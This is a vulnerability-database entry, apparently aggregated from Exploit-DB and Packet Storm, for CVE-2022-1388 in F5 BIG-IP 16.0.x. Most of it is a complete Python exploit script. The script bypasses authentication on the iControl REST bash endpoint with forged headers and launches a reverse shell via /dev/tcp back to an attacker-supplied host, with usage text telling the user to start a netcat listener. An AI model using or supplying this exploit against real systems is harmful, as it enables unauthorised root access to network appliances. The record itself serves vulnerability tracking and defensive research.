ID
VAR-E-202205-0043
CVE
| cve_id: | CVE-2022-1388 | Trust: 2.5 |
EDB ID
50932
TITLE
F5 BIG-IP 16.0.x - Remote Code Execution (RCE) - Multiple remote Exploit
Trust: 1.0
DESCRIPTION
F5 BIG-IP 16.0.x - Remote Code Execution (RCE). CVE-2022-1388 . remote exploit for Multiple platform
Trust: 1.0
AFFECTED PRODUCTS
| vendor: | f5 | model: | big-ip | scope: | eq | version: | 16.0.x | Trust: 1.5 |
| vendor: | f5 | model: | big-ip icontrol | scope: | - | version: | - | Trust: 0.5 |
| vendor: | f5 | model: | big-ip | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388
from requests import Request, Session
import sys
import json
def title():
print('''
_______ ________ ___ ___ ___ ___ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ <
| |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) |
\_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')
def exploit(url, lhost, lport):
url = url + 'mgmt/tm/util/bash'
data = {
"command":"run",
"utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
}
headers = {
'Authorization': 'Basic YWRtaW46',
'Connection':'keep-alive, X-F5-Auth-Token',
'X-F5-Auth-Token': '0'
}
s = Session()
req = Request('POST', url, json=data, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15
)
#print(prepped.headers)
#print(url)
#print(resp.headers)
#print(resp.json())
print(resp.status_code)
if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 1.0
PRICE
free
Trust: 1.0
TYPE
code execution
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.5 |
| tag: | remote | Trust: 1.5 |
| tag: | code execution | Trust: 1.5 |
| tag: | root | Trust: 0.5 |
| tag: | bash | Trust: 0.5 |
| tag: | bypass | Trust: 0.5 |
| tag: | proof of concept | Trust: 0.5 |
CREDITS
Yesith Alvarez
Trust: 1.0
EXTERNAL IDS
| db: | NVD | id: | CVE-2022-1388 | Trust: 2.5 |
| db: | EXPLOIT-DB | id: | 50932 | Trust: 1.0 |
| db: | PACKETSTORM | id: | 167150 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 167118 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 167007 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2022-1388 | Trust: 2.5 |
SOURCES
| db: | PACKETSTORM | id: | 167150 |
| db: | PACKETSTORM | id: | 167118 |
| db: | PACKETSTORM | id: | 167007 |
| db: | EXPLOIT-DB | id: | 50932 |
LAST UPDATE DATE
2022-11-21T17:24:31.233000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 167150 | date: | 2022-05-12T16:11:08 |
| db: | PACKETSTORM | id: | 167118 | date: | 2022-05-12T15:35:02 |
| db: | PACKETSTORM | id: | 167007 | date: | 2022-05-09T16:17:42 |
| db: | EXPLOIT-DB | id: | 50932 | date: | 2022-05-12T00:00:00 |